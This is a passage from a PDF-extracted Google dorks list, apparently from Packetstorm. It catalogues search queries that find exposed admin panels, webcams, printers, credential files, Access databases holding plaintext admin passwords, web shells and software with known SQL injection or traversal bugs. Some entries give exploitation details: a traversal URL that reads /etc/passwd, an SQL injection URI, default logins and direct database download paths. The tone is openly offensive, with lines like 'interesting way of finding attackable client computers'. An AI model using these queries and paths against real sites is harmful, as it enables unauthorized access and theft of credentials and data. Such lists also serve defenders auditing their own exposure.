logical, clean manner with day, week,month, and year navigation.Thisreveals the administration interface.

intitle:"WebServer Statisticsfor ****"

intitle:"Web Server Statistics for****"

These are www analog webstat reports.The failure report shows informationleakage about database drivers, adminlogin pages, SQL statements, etc.

filetype:phpinurl:indexinurl:phpicalendar-site:sourceforge.net

filetype:php inurl:indexinurl:phpicalendar -site:sourceforge.net

PHP iCalendar is a php-based iCal fileparser. Its based on v2.0 of the IETFspec. It displays iCal files in a nicelogical, clean manner with day, week,month, and year navigationThis revealsthe RSS info for the user calendars.

intitle:"phpicalendaradministration" -site:sourceforge.net

intitle:"php icalendaradministration" -site:sourceforge.net

This is the adminstration login portalsearch for PHP iCalendar. It iscompatible with Evolution and clientsfor other platforms. Adminuuthentication has two choices, FTPand Internal. For the latter the defaultsare "admin/admin".There is also a moregeneric search in the GHDB that anattacker use and then modify to../admin.php to reach the adminstrationpages. Access to adminstration allowsan attacker to upload new ICS files ordelete present ones.

intitle:phpMyAdmin "Welcome tophpMyAdmin***" "running on *as root@*"

intitle:phpMyAdmin "Welcome tophpMyAdmin ***" "running on *as root@*"

phpMyAdmin is a tool written in PHPintended to handle the administrationof MySQL over the Web. Currently itcan create and drop databases,create/drop/alter tables, delete/edit/addfieldsThe servers found here can beacessed without authentication. Thissearch is restricted to NON-ROOTusers! See ID 510 for a root usersearch.

"please visit"intitle:"i-CatcherConsole"Copyright "iCodeSystems"

"please visit" intitle:"i-CatcherConsole" Copyright "iCodeSystems"

CCTV webcams by ICode.

inurl:ircfiletype:cgi cgi:irc inurl:irc filetype:cgi cgi:irc

CGIIRC is a web-based IRC client.Using a non-transparent proxy anattacker could communicate

Page 124: Packetstorm Google Dorks List

anonymously by sending directmessages to a contact. Most servers arerestricted to one irc server and one ormore default channels and will not letallow access to anything else.

natterchatinurl:home.asp -site:natterchat.co.uk

natterchat inurl:home.asp -site:natterchat.co.uk

NatterChat is a webbased chat systemwritten in ASP.An SQL injectionvulnerability is identified in theapplication that may allow attackers topass malicious input to databasequeries, resulting in the modification ofquery logic or other attacks. Thisallows the attacker to gain adminaccess...

filetype:infinurl:capolicy.inf filetype:inf inurl:capolicy.inf

The CAPolicy.inf file providesCertificate Servicces configurationinformation, which is read duringinitial CA installation an whenever yourenew a CA certificate. TheCApolicy.inf file defines settingsspecific to root CAs, as well as settingsthat affect all CAs in the CAhierarchiy.

"CertificatePracticeStatement"inurl:(PDF | DOC)

"Certificate Practice Statement"inurl:(PDF | DOC)

Certificate Practice Statement (CPS)ACPS defines the measures taken tosecure CA operation and themanagement of CA-issued certificates.You can consider a CPS to be anagreement between the organizationmanaging the CA and the peoplerelying on on the certificates issued bythe CA.

filetype:cgiinurl:cachemgr.cgi filetype:cgi inurl:cachemgr.cgi

cachemgr.cgi is a managementinterface for the Squid proxy service. Itwas installed by default in /cgi-bin byRedHat Linux 5.2 and 6.0 installedwith Squid. This script prompts for ahost and port which it then attempts toconnect to. If a web server, such asapache, is running this can be used toconnect to arbitrary hosts and ports,allowing for potential use as anintermediary in denial of serviceattacks, proxied port scans, etc.Interpreting the output of the script can

Page 125: Packetstorm Google Dorks List

allow the attacker to determine whetheror not a connection was established.

inurl:chap-secrets -cvs inurl:chap-secrets -cvs

linux vpns store their usernames andpasswords for CHAP authentificationin a file called "chap-secrets" where theusernames and the passwords are incleartext.

inurl:pap-secrets -cvs inurl:pap-secrets -cvs

linux vpns store there usernames andpasswords for PAP authentification in afile called "pap-secrets" where theusernames and the passwords are incleartext.

filetype:iniinurl:"serv-u.ini" filetype:ini inurl:"serv-u.ini"

serv-U is a ftp/administration server forWindows. This file leaks info about theversion, username and password.Passwords are in encrypted, but there isa decryption program available on theNet. An attacker could use this searchto upload dangerous code etc.

inurl:"forumdisplay.php" +"Poweredby: vBulletinVersion 3.0.0..4"

inurl:"forumdisplay.php"+"Powered by: vBulletin Version3.0.0..4"

vBulletin is reported vulnerable to aremote SQL injection vulnerability.This issue is due to a failure of theapplication to properly validate user-supplied input prior to including it inan SQL query. An attacker may exploitthis issue to manipulate and inject SQLqueries onto the underlying database. Itwill be possible to leverage this issue tosteal database contents includingadministrator password hashes and usercredentials as well as to make attacksagainst the underlying database.Versions 3.0 through to 3.0.3 arereportedly affected by thisissue.http://www.securityfocus.com/bid/11193

WebControlintitle:"AMXNetLinx"

WebControl intitle:"AMX NetLinx"

AMX Netlink is a server appliancewhich connects various devices like abeamer, laptop or video recorder to theinternet.

inurl:ConnectComputer/precheck.htm |inurl:Remote/logo

inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx

Windows Small Business Server 2003:The network configuration page iscalled"ConnectComputer/precheck.htm " and

Page 126: Packetstorm Google Dorks List

n.aspx the Remote Web login page is called"remote/logon.aspx".

inurl:aol*/_do/rss_popup?blogID= inurl:aol*/_do/rss_popup?blogID=

AOL Journals BlogID IncrementingDiscloses Account Names and EmailAddressesAOL Journals is basically"America Online's version of a blog(weblog) for AOLmembers/subscribers. A vulnerabilityin AOL Journals BlogID allows anattacker to numbers provided to theprogram and enumerate a list of AOLmembers/subscribers and theircorresponding email.

(inurl:/shop.cgi/page=) |(inurl:/shop.pl/page=)

(inurl:/shop.cgi/page=) |(inurl:/shop.pl/page=)

This is a "double dork" finds twodifferent shopping carts, bothvulnerable1) Cyber-Village OnlineConsulting Shopping CartCyber-Village's script is known to not sanitizethe user input properly which leads tocode execution problems.2) HassanConsulting's Shopping CartForHassan's cart it is reported that aremote user can request the 'shop.cfg'and that the script allows directorytraversal.

inurl:newsdesk.cgi? inurl:"t=" inurl:newsdesk.cgi? inurl:"t="

Newsdesk is a cgi script designed toallow remote administration of websitenews headlines.Due to a failure in thesanitization of parameters a remoteuser can reveal the contents of any file.This allows the attacker to downloaduser and password data.It isfurthermore known that it is possible torun system commands remotely.

"Switch to tableformat"inurl:table|plain

"Switch to table format"inurl:table|plain

This is an index page of OReillyWebSite Professional.WebsitePro wasdeveloped by O'reily and disconinuedon August 2001. The product was thencontinued by Deerfield.com

intitle:"Home""XeroxCorporation""Refresh Status"

intitle:"Home" "Xerox Corporation""Refresh Status"

CentreWare Internet Services is aninteractive service that uses Internettechnology to extend the capabilities ofyour DocuPrint printer using Internettechnology. An HTTP server

Page 127: Packetstorm Google Dorks List

application developed by Xerox isresident on your network-enabledDocuPrint printer. This HTTP serverprovides access to advanced servicesfor the installation, configuration, andmanagement of your DocuPrint printer.

inurl:webutil.pl inurl:webutil.pl

webutil.pl is a web interface to thefollowing services:* ping* traceroute*whois* finger* nslookup* host*dnsquery* dig* calendar* uptime

"About Mac OSPersonal WebSharing"

"About Mac OS Personal WebSharing"

Mac OS Personal Web Sharing allowsMac OS users to share Folders over theWeb.If you open this page you willshown the system's major version asrequirement.

ext:confNoCatAuth -cvs ext:conf NoCatAuth -cvs

NoCatAuth configuration file. Thisreveals the configuration details ofwirless gateway including ip addresses,device names and pathes.

inurl:"putty.reg" inurl:"putty.reg"

This registry dump contains puttysaved session data. SSH servers theaccording usernames and proxyconfigurations are stored here.

intitle:"IcecastAdministrationAdmin Page"

intext:"Icecast AdministrationAdmin Page" intitle:"IcecastAdministration Admin Page"

Icecast streaming audio server webadmin.This gives you a list ofconnected clients. Interesting way offinding attackable client computers.

inurl:/adm-cfgedit.php inurl:/adm-cfgedit.php

PhotoPost Pro is photo gallery system.This dork finds its installationpage.You can use this page to set allparameters of the system. The existingdata is not shown :(

"liveiceconfiguration file"ext:cfg -site:sourceforge.net

"liveice configuration file" ext:cfg -site:sourceforge.net

This finds the liveice.cfg file whichcontains all configuration data for anIcecast server. Passwords are savedunencrypted in this file.

inurl:portscan.php"from Port"|"PortRange"

inurl:portscan.php "from Port"|"PortRange"

This is general search for online portscanners which accept any IP. It doesnot find a specific scanner script, butsearches for a pattern which will matchsome more scanners.

intitle:"sysinfo * " intitle:"sysinfo * " Lots of information leakage on these

Page 128: Packetstorm Google Dorks List

intext:"Generatedby Sysinfo *written by TheGamblers."

intext:"Generated by Sysinfo *written by The Gamblers."

pages about active network services,server info, network connections, etc..

filetype:pst pst -from -to -date filetype:pst pst -from -to -date

Finds Outlook PST files which cancontain emails, calendaring and addressinformation.

intitle:Configuration.Fileinurl:softcart.exe

intitle:Configuration.Fileinurl:softcart.exe

This search finds configuration fileerrors within the softcart application. Itincludes the name of the configurationfile and discloses server file paths.

inurl:technoteinurl:main.cgi*filename=*

inurl:technoteinurl:main.cgi*filename=*

http://www.securityfocus.com/bid/2156/discussion/ Remote commandexecution vulnerability in the filenameparameter.

intext:"Ready with10/100T Ethernet"

intext:"Ready with 10/100TEthernet" Xerox 860 and 8200 Printers.

intext:"UAA(MSB)" Lexmark -ext:pdf

intext:"UAA (MSB)" Lexmark -ext:pdf

Lexmark printers (T620, T522, OptraT614, E323, T622, Optra T610, OptraT616, T520 and Optra S 1855)

intitle:"Welcometo Your NewHome Page!" "bythe Debianrelease"

intitle:"Welcome to Your NewHome Page!" "by the Debianrelease"

This finds the default Apache page onDebian installs.

"intitle:Index.Of /"stats merchant cgi-* etc

"intitle:Index.Of /" stats merchantcgi-* etc

This search looks for indexes with thefollowing subdirectories: stats,merchant, online-store and cgi-local orcgi-bin. These servers have a shoppingcart application called softcart in theircgi-local or cgi-bin directory.Reportedly, it is possible to executearbitrary code by passing a malformedCGI parameter in an HTTP GETrequest. This issue is known to affectSoftCart version 4.00b.

"running: Nucleusv3.1" -.nucleuscms.org -demo

"running: Nucleus v3.1" -.nucleuscms.org -demo

Multiple unspecified vulnerabilitiesreportedly affect Nucleus CMS. Aremote attacker may leverage theseissues to steal cookie-basedauthentication credentials, revealsensitive data and corrupt databasecontents.

Page 129: Packetstorm Google Dorks List

http://www.securityfocus.com/bid/11631

"intitle:CiscoSystems, Inc. VPN3000Concentrator"

"intitle:Cisco Systems, Inc. VPN3000 Concentrator"

The Cisco VPN 3000 Concentrator is aremote access VPN. The 'Concentrator'is a piece of hardware that manages acompanies VPN's. This google dorksearches for the Concentrators loginportal for remote access. With thecorrect username and password anattacker can '0wn' their Concentrator;i.e. be able to delete, copy, read,configure anything on theConcentrator.

"driven by: ASPMessage Board" "driven by: ASP Message Board"

Multiple unspecified vulnerabilitiesreportedly affect the Infusium ASPMessage Board. A remote attacker mayleverage these issues to steal cookie-based authentication credentials, revealsensitive data and corrupt databasecontents. vulnerable Infuseum ASPMessage Board 2.2.1 cAdding the2.2.1c seems to filter out some goodpositives, so I left it out.

ext:aspinurl:DUgalleryintitle:"3.0" -site:dugallery.com-site:duware.com

ext:asp inurl:DUgallery intitle:"3.0"-site:dugall

The MS access database can bedownloaded from inside the docroot.The user table holds the adminpassword in plain text. Possiblelocations for the dugallery databaseare:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html

ext:asp "poweredby DUForum"inurl:(messages|details|login|default|register) -site:duware.com

ext:asp "powered by DUForum"inurl:(messages|details|login|default|register) -site:duware.com

DUForum is one of those free forumsoftware packages. The databaselocation is determined by the configfile "connDUforumAdmin.asp", but theinstallation instructions don'trecommend changing it.Ouch..Database location is:http://server/duforum/_private/DUforum.mdb

intext:"enablesecret 5 $" intext:"enable secret 5 $" sometimes people make mistakes and

post their cisco configs on "help sites"

Page 130: Packetstorm Google Dorks List

and don't edit the sensitive fields first.Don't forget to also query GoogleGroups for this string.

inurl:postfixadminintitle:"postfixadmin" ext:php

inurl:postfixadmin intitle:"postfixadmin" ext:php Postfix Admin login pages. Duh.

ext:cgiinurl:editcgi.cgiinurl:file=

ext:cgi inurl:editcgi.cgi inurl:file=

This was inspired by the K-Otic report.Only two results at time of writing. Thecgi script lets you view any file on thesystem, including /etc/.. (guess it;)http://www.k-otik.com/exploits/08242004.Axis.sh.php

inurl:axis-cgi inurl:axis-cgi

Just another search string to detect theinfamous Axis netcams. This companyactually changed the generic /cgi-bin/directory name to /axis-cgi/, making iteasier to d0rk them ;)

filetype:ns1 ns1 filetype:ns1 ns1

Netstunbler files contain informationabout the wireless network. For acleanup add stuff like: +"Creator"+"Format" +"DateGMT".

"Starting SiteZAP6.0" "Starting SiteZAP 6.0" siteZap webcams !

intitle:"phpPgAdmin - Login"Language

intitle:"phpPgAdmin - Login"Language

phpPgAdmin is a web-basedadministration tool for PostgreSQL. Itis perfect for PostgreSQL DBAs,newbies and hosting services

filetype:configweb.config -CVS filetype:config web.config -CVS

Through Web.config an IISadminstrator can specify settings likecustom 404 error pages, authenticationand authorization settings for the Website. This file can hold a plaintextpassword in the worst case or justreveil the full path info on a 404 error.

filetype:myd myd-CVS filetype:myd myd -CVS

MySQL stores its data for eachdatabase in individual files with theextension MYD.An attacker can copythese files to his machine and using atool like 'strings' possibly view thecontents of the database.

"Obtenez votreforum Aztek" -

"Obtenez votre forum Aztek" -site:forum-aztek.com

Atztek Forum is a french forumsystem. Aztek Forum is reported prone

Page 131: Packetstorm Google Dorks List

site:forum-aztek.com

to multiple input validationvulnerabilities. These issues may allowan attacker to carry out cross-sitescripting and possibly otherattacks.http://www.securityfocus.com/bid/11654

inurl:/SiteChassisManager/ inurl:/SiteChassisManager/

Unknown SQL injection and XSSvulnerabilities in DMXReady SiteChassisManager.http://www.securityfocus.com/bid/11434/discussion/

"Powered by LandDown Under 601"

"Powered by Land Down Under601"

sQL injection vulnerability in LandDown Under 601 could give anattacker administrative access. Anexploit exists on the internet, searchgoogle.

intitle:"EvoCam"inurl:"webcam.html"

intitle:"EvoCam"inurl:"webcam.html" Evocams !

inurl:directorypro.cgi inurl:directorypro.cgi

A security vulnerability in the productallows attackers to perform a directorytraversal attack and access files thatreside outside the normal HTTP rootdirectory.http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793

intitle:"PhpMyExplorer"inurl:"index.php" -cvs

intitle:"PhpMyExplorer"inurl:"index.php" -cvs

PhpMyExplorer is a PHP applicationthat allows you to easily update yoursite online without any FTP access. Asecurity vulnerability in the productallows attackers to view and read filesthat reside outside the normal bounddirectory.

inurl:cal_make.pl inurl:cal_make.pl

A security vulnerability in PerlCalallows remote attackers to access filesthat reside outside the normallybounding HTML root directory.http://www.securityfocus.com/bid/2663

inurl:/webedit.*intext:WebEditProfessional -html

inurl:/webedit.* intext:WebEditProfessional -html

WebEdit is a content managementsystem. This is the login portal search.

Page 132: Packetstorm Google Dorks List

intitle:"Apache::Status" (inurl:server-status |inurl:status.html |inurl:apache.html)

intitle:"Apache::Status"(inurl:server-status |inurl:status.html | inurl:apache.html)

The Apache::Status returns informationabout the server software, operatingsystem, number of child processes andcurrent visitors. The officialdocumentation can be found athxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm

"Powered byPowerPortal v1.3" "Powered by PowerPortal v1.3"

PowerPortal is reported vulnerable toremote SQL injection. This issue is dueto a failure of the application toproperly validate user-supplied inputprior to including it in an SQL query.PowerPortal 1.3 is reported prone tothis vulnerability, however, it ispossible that other versions are affectedas well. An example URI sufficient toexploit this vulnerability has beenprovided:http://www.example.com/pp13/index.php?index_page=and1=1http://www.securityfocus.com/bid/11681

"Microsoft (R)Windows * (TM)Version *DrWtsn32Copyright (C)"ext:log

"Microsoft (R) Windows * (TM)Version * DrWtsn32 Copyright(C)" ext:log

This file spills a lot of juicy info... insome cases, passwords in the rawdump, but not in any I've found thistime around. However, with acomputer name, a user name, andvarious other nuggets of info, this onefile seems to sketch the system prettywell.

inurl:report"EVEREST HomeEdition "

inurl:report "EVEREST HomeEdition "

Well what can be said about this one,I've added it to the DB under Juicyinfo, however it could have easillygone under virtually any of the lists asit just give out Soooo much info. I canfor instance find out the adminusername (not just the adin every user)and also if it password protected and ifthe password ever expires plus is it acurrent user account, also do the samefor any guest accounts, Ok nice andeasy how about the O/S and all theMapped Drive locations all there alongwith installed software and evencurrently running applications and

Page 133: Packetstorm Google Dorks List

processes. Site admins would have tobe mad to leave this stuff open, but aswe all know from the GHDB Siteadmins do weird and funny stuff. Thisone just gives out to much to list, so gohave a look and see what you can find.

"powered byminibb" -site:www.minibb.net -intext:1.7f

"powered by minibb" -site:www.minibb.net -intext:1.7f

miniBB is reported vulnerable toremote SQL injection. This issue is dueto a failure of the application toproperly validate user-supplied inputprior to including it in an SQL query.miniBB versions prior to 1.7f arereported prone to thisissue.http://www.securityfocus.com/bid/11688

"powered byducalendar" -site:duware.com

"powered by ducalendar" -site:duware.com

Most duware products use MicrosoftAccess databases in default locationswithout instructing the users to changethem. The plain text admin passwordsare just a click away for any attackerwho knows how to type an URL. ForDucalendar it's:/ducalendar/_private/ducalendar.mdb

"Powered byDuclassified" -site:duware.com

"Powered by Duclassified" -site:duware.com

Most duware products use MicrosoftAccess databases in default locationswithout instructing the users to changethem. The plain text admin passwordsare just a click away for any attackerwho knows how to type an URL. ForDuclassified it's:/duclassified/_private/duclassified.mdb

"Powered byDudirectory" -site:duware.com

"Powered by Dudirectory" -site:duware.com

Most duware products use MicrosoftAccess databases in default locationswithout instructing the users to changethem. The plain text admin passwordsare just a click away for any attackerwho knows how to type an URL. ForDuDirectory it's:/dudirectory/_private/dudirectory.mdb

"Powered byDuclassified" -site:duware.com"DUware AllRights reserved"

"Powered by Duclassified" -site:duware.com "DUware AllRights reserved"

Most duware products use MicrosoftAccess databases in default locationswithout instructing the users to changethem. The plain text admin passwordsare just a click away for any attacker

Page 134: Packetstorm Google Dorks List

who knows how to type an URL. ForDuclassified it's:/duclassified/_private/duclassified.mdb

"powered byduclassmate" -site:duware.com

"powered by duclassmate" -site:duware.com

Most duware products use MicrosoftAccess databases in default locationswithout instructing the users to changethem. The plain text admin passwordsare just a click away for any attackerwho knows how to type an URL. ForDuclassmate it's:/duclassmate/_private/duclassmate.mdb

intitle:dupicsinurl:(add.asp |default.asp |view.asp |voting.asp) -site:duware.com

intitle:dupics inurl:(add.asp |default.asp | view.asp | voting.asp) -site:duware.com

Most duware products use MicrosoftAccess databases in default locationswithout instructing the users to changethem. The plain text admin passwordsare just a click away for any attackerwho knows how to type an URL. ForDupics rename location to../_private/dupics.mdb

"powered bydudownload" -site:duware.com

"powered by dudownload" -site:duware.com

Most duware products use MicrosoftAccess databases in default locationswithout instructing the users to changethem. The plain text admin passwordsare just a click away for any attackerwho knows how to type an URL.rename ../xxx to../_private/dudownload.mdb

intitle:"ipcop -main" intitle:"ipcop - main"

IPCop Firewall is a Linux firewall forhome and SOHO users. IPCop can bemanaged from a simple web interface(which can be found and managed byGoogle Hackers ;)

intitle:"Smoothwall Express"inurl:cgi-bin "up *days"

intitle:"Smoothwall Express"inurl:cgi-bin "up * days"

smoothwall is a firewall operatingsystem distribution based on Linux.(Not many results for this search at themoment).

filetype:phpHAXPLORER"Server FilesBrowser"

filetype:php HAXPLORER "ServerFiles Browser"

Haxplorer is a webbased filemanagerwhich enables the user to browse fileson the webserver. You can rename,delete, copy, download and uploadfiles. As the script's name says it ismostly installed by hackers

inurl:coranto.cgiintitle:Login

inurl:coranto.cgi intitle:Login(Authorized Users Only)

Coranto is one of the most powerfulContent Management System (CMS)

Page 135: Packetstorm Google Dorks List

(Authorized UsersOnly)

available on the market. It is a freewareproduct written in Perl and it can helpthe development and streamlining ofyour site(s). It is written to be amultiuser environment for postingnews articles on a web site, it supportsmultiple browsers, multiple operatingsystems, produces standard complianthtml, has a huge variety of excellentfeatures and is fully extendible viaaddons. It is free for use on any site,personal or commercial!

filetype:logintext:"ConnectionManager2"

filetype:logintext:"ConnectionManager2"

ISDNPM 3.x for OS/2-Dialer logfiles.These files contain sensitive infolike ip addresses, phone numbers ofdial in servers, usernames andpassword hashes - Everything you needto dial in....

intext:"Videoconference ManagementSystem" ext:htm

intext:"VideoconferenceManagement System" ext:htm

Tandberg video conferencingappliancesThe webinterface enablesyou to drop calls and to browse theinternal phonebook

ext:txt "Finalencryption key" ext:txt "Final encryption key"

IPSec debug/log data which containsuser data and password hashes.Can beused to crack passwords.

filetype:log "See`ipsec --copyright" filetype:log "See `ipsec --copyright"

BARF log filesMan page:Barf outputs(on standard output) a collection ofdebugging information (contents offiles, selections from logs, etc.) relatedto the IPSEC encryption/authenticationsystem. It is primarily a conveniencefor remote debugging, a singlecommand which packages up (andlabels) all information that might berelevant to diagnosing a problem inIPSEC.

intitle:"WelcomeTo Xitami" -site:xitami.com

intitle:"Welcome To Xitami" -site:xitami.com

Default Xitami installationAdditionallyevery default installation of Xitamiwebserver has a testscript whichprovides a lot of information about theserver.It can be run by entering thefollowingurlhttp://server/cgialias/testcgi.exe(cgialias = is usually /cgi-bin/)

Page 136: Packetstorm Google Dorks List

inurl:testcgi xitami inurl:testcgi xitami

Testpage / webserver environmentThisis the test cgi for xitami webserver. Itshows the webserver's completeenvironment. Contains very interestinginformation which can be used a firststep into the server.

intitle:"DocuShare"inurl:"docushare/dsweb/" -faq -gov -edu

intitle:"DocuShare"inurl:"docushare/dsweb/" -faq

some companies use a Xerox Productcalled DocuShare. The problem withthis is by default guest access isenabled and it appears a lot ofcompanies either don't care or don'tknow.

intext:"PoweredBy: TotalIndex"intitle:"TotalIndex"

intext:"Powered By: TotalIndex"intitle:"TotalIndex"

TotalIndex v2.0 is an open sourcescript that is designed to replace thesimple, and boring default index pageof a site which lists the files in anindexed folder. It's not PW protected soan attacker can browse the files andtake what they want.

inurl:"GRC.DAT"intext:"password"

inurl:"GRC.DAT"intext:"password"

symantec Norton Anti-Virus CorporateEdition data file containing encryptedpasswords.

inurl:php.exefiletype:exe -example.com

inurl:php.exe filetype:exe -example.com

It is possible to read any file remotelyon the server with PHP.EXE (assuminga script alias for it is enabled), evenacross drives. (Note: The GHDB hasanother search for this file based ondirectorly listings, try them both)

intitle:"PHPAdvancedTransfer"inurl:"login.php"

intitle:"PHP Advanced Transfer"inurl:"login.php"

PHP Advacaned Transfer is GPL'dsoftware that claims to be the "Theultimate PHP download & uploadmanager". This is a search for the loginpages.

intitle:"PHPAdvancedTransfer"(inurl:index.php |inurl:showrecent.php )

intitle:"PHP Advanced Transfer"(inurl:index.php |inurl:showrecent.php )

PHP Advacaned Transfer is GPL'dsoftware that claims to be the "Theultimate PHP download & uploadmanager". This is a search for the mainand recently changed files pages.

"Output producedby SysWatch *" "Output produced by SysWatch *"

sysWatch is a CGI to display currentinformation about your UNIX system.It can display drive partitions, disk ordrive usage, as well as resource hogs(running processes) and last but not

Page 137: Packetstorm Google Dorks List

lease it shows what current users aredoing online (including sh scripts etc..).

PHPKonsolePHPShellfiletype:php -echo

PHPKonsole PHPShell filetype:php-echo

PHPKonsole is just a little telnet likeshell wich allows you to run commandson the webserver. When you runcommands they will run as thewebservers UserID. This should workperfectly for managing files, likemoving, copying etc. If you're using alinux server, system commands such asls, mv and cp will be available foryou...

"Phorum Admin""DatabaseConnection"inurl:foruminurl:admin

"Phorum Admin" "DatabaseConnection" inurl:foruminurl:admin

Phorum admin pagesThis either showsInformation leakage (path info) or itshows Unprotected Admin pages.

"Warning:mysql_query()""invalid query"

"Warning: mysql_query()" "invalidquery"

MySQL query errors revealingdatabase schema and usernames.

inurl:"/cgi-bin/loadpage.cgi?user_id="

inurl:"/cgi-bin/loadpage.cgi?user_id="

Description:EZshopper is a full-featured shopping cart program.loadpage.cgi of EZshopper allowsDirectory Traversalhttp://www.securityfocus.com/bid/2109

filetype:mdbinurl:"news/news" filetype:mdb inurl:"news/news"

Web Wiz Site News unprotecteddatabase holds config and admininformation in a microsoft accessdatabase in news/news.mdb. Thisinformation is almost alwaysunprotected.

intitle:"View Img"inurl:viewimg.php

intitle:"View Img"inurl:viewimg.php

It is reported that the 'viewing.php'script does not properly validate user-supplied input in the 'path' variable. Aremote user can submit a speciallycrafted URL to view a list of fileswithin an arbitrary directory. Seehttp://securitytracker.com/alerts/2004/Nov/1012312.html for moreinformation.

intitle:"ResinDefault HomePage"

intitle:"Resin Default Home Page"Resin provides a fast standalone webserver. This search locates thoseservers based on the title of the default

Page 138: Packetstorm Google Dorks List

page.filetype:pl -intext:"/usr/bin/perl" inurl:webcal(inurl:webcal |inurl:add |inurl:delete |inurl:config)

filetype:pl -intext:"/usr/bin/perl"inurl:webcal (inurl:webcal |inurl:add | inurl:delete |inurl:config)

WebCal allows you to create andmaintain an interactive events calendaror scheduling system on your Web site.The file names explain themselves, butdon't abuse the faulty admins.

site:ups.comintitle:"UpsPackage tracking"intext:"1Z ### ##### #### ### #"

site:ups.com intitle:"Ups Packagetracking" intext:"1Z ### ### ###### ### #"

Ever use the UPS Automated TrackingService?? Wanna see where packagesare going? Want to Man-in-the-middletheir delivery? Well, then here it is.-Digital Spirit

intitle:"twiki"inurl:"TWikiUsers"

intitle:"twiki" inurl:"TWikiUsers"

TWiki has many security problems,depeding on the version installed.TWiki, is a flexible, powerful, and easyto use enterprise collaborationplatform. It is a structured Wiki,typically used to run a projectdevelopment space, a documentmanagement system, a knowledgebase, or any other groupware tool, onan intranet or on the internet. Webcontent can be created collaborativelyby using just a browser. Developerscan create new web applications basedon a Plugin API.

+"Powered byInvision PowerBoard v2.0.0..2"

+"Powered by Invision PowerBoard v2.0.0..2"

A remote SQL injection vulnerabilityaffects Inivision Power Board. Thisissue is due to a failure of theapplication to properly validate user-supplied input prior to using it in anSQLquery.http://www.securityfocus.com/bid/11719

ext:gho gho ext:gho gho

Norton Ghost allows administrators tocreate hard rive images for lots ofpurposes including backup, migration,etc. These files contain the hard driveimages which can be restored to createan exact duplicate of a hard drive,which could contain just aboutanything!

ext:pqi pqi - ext:pqi pqi -database PQ DriveImage allows administrators

Page 139: Packetstorm Google Dorks List

database to create hard rive images for lots ofpurposes including backup, migration,etc. These files contain the hard driveimages which can be restored to createan exact duplicate of a hard drive,which could contain just aboutanything!

ext:vmdk vmdk ext:vmdk vmdk

VMWare allows PC emulation across avariety of platforms. These files areVMWare disk images whichessentially contain a copy of an entirePC, which could contain almostanything.

ext:vmx vmx ext:vmx vmx

VMWare allows PC emulation across avariety of platforms.Theseconfiguration files describe avirtual PC, and reveal informationabout that PC's hardware settings.

inurl:filezilla.xml -cvs inurl:filezilla.xml -cvs

filezilla.xml contains Sites,Logins andcrypted Passwords of ftp connectionsmade with the open source programmfilezilla.

+"Powered byphpBB 2.0.6..10" -phpbb.com -phpbb.pl

+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl

phpbb is vulnerable to SQL Injection,allowing people to minipulate thequery into pulling data (such aspasswords). Arbituary EXEC allows anattacker (if they get on to a new line),to execute their own PHP, which canbe fatal.

"Copyright (c)Tektronix, Inc.""printer status"

"Copyright (c) Tektronix, Inc.""printer status" Captain, the Phasers are online :)

intext:"MaiLinXAlert (Notify)" -site:networkprinters.com

intext:"MaiLinX Alert (Notify)" -site:networkprinters.com Xerox DocuPrint printer models.

inurl:"printer/main.html"intext:"settings"

inurl:"printer/main.html"intext:"settings" Brother HL Printers.

axis storpoint "fileview"inurl:/volumes/

axis storpoint "file view"inurl:/volumes/

The Axis Storpoint device turns a SCSIor ATA box with lots of cdrom players(or writers) into a cd tower which canbe browsed through any browser. The

Page 140: Packetstorm Google Dorks List

default admin password combo =root/pass. CD access can be passwordrestricted like in Apache. Axis uses it'sown server software. Manyvulnerabilities can be found in thesecurity databases like SF.

inurl:"/axs/ax-admin.pl" -script inurl:"/axs/ax-admin.pl" -script

This system records visits to your site.This admin script allows you to displaythese records in meaningful graph anddatabase formats.

"Generated byphpSystem" "Generated by phpSystem"

PhpSystem shows info about unixsystems, including: General Info(kernel, cpu, uptime), Connections,Who Is Logged In, Memory, Swap andactive mounts.

php-addressbook"This is theaddressbook for *"-warning

php-addressbook "This is theaddressbook for *" -warning

php-addressbook shows user addressinformation without a password.

intitle:"MultimonUPS status page" intitle:"Multimon UPS status page" Multimon provide UPS monitoring

services

intitle:"MailServerCMailServerWebmail" "5.2"

intitle:"Mail Server CMailServerWebmail" "5.2"

CMailServer is a small mail webmailserver. Multiple vulnerabilities werefound, including buffer overflow, SQLInjection andXXS.http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html

intitle:"index of""parent directory""desktop.ini"site:dyndns.org

intitle:"index of" "parent directory""desktop.ini" site:dyndns.org

This search uses desktop.ini to trackusers with a webserver running on theirdesktop computers. It can easily beextended to find specific documents.

intitle:"LiveNetSnap Cam-Server feed"

intitle:"Live NetSnap Cam-Serverfeed" Netsnap Online Cameras

intitle:"V-GearBEE" intitle:"V-Gear BEE" V-Gear Bee Web Cameras

intitle:"AudioReQuest.web.server" intitle:"AudioReQuest.web.server"

Audio ReQuest home CD/MP3 player.Various information about theconfiguration of the host andsurrounding network can be found outby visiting the main page of this server.Beyond that, you could perusesomeones MP3 collection!

Page 141: Packetstorm Google Dorks List

filetype:phpinurl:ipinfo.php"DistributedIntrusionDetection System"

filetype:php inurl:ipinfo.php"Distributed Intrusion DetectionSystem"

Dshield is a distributed intrusiondetection system. The ipinfo.php scriptincludes a whois lookup form.

ext:cfg radius.cfg ext:cfg radius.cfg

"Radiator is a highly configurable andflexible Radius server that supportsauthentication by nearly 60 differenttypes of authentication methods"Thissearch finds configuration files for thisserver, revealing its behaviour,methods for authenticating users, etc.

intitle:"VitalQIPIP ManagementSystem"

intitle:"VitalQIP IP ManagementSystem"

The VitalQIP Web Client Interfaceprovides a World Wide Web interfacefor the VitalQIP IP Managementsoftware. The purpose of the VitalQIPWeb Client Interface is to allow usersto add, modify, and delete IPaddresses; create configuration anddata files; and generate reports. It is nota fully functional user interface, suchas the VitalQIP Windows or VitalQIPUNIX Clients. Certain options, such asinfrastructure or policy management,are not provided. The VitalQIP WebClient Interface software is based onHTML and Perl, so your organizationcan customize it to meet yourrequirements. Vendors site:http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html

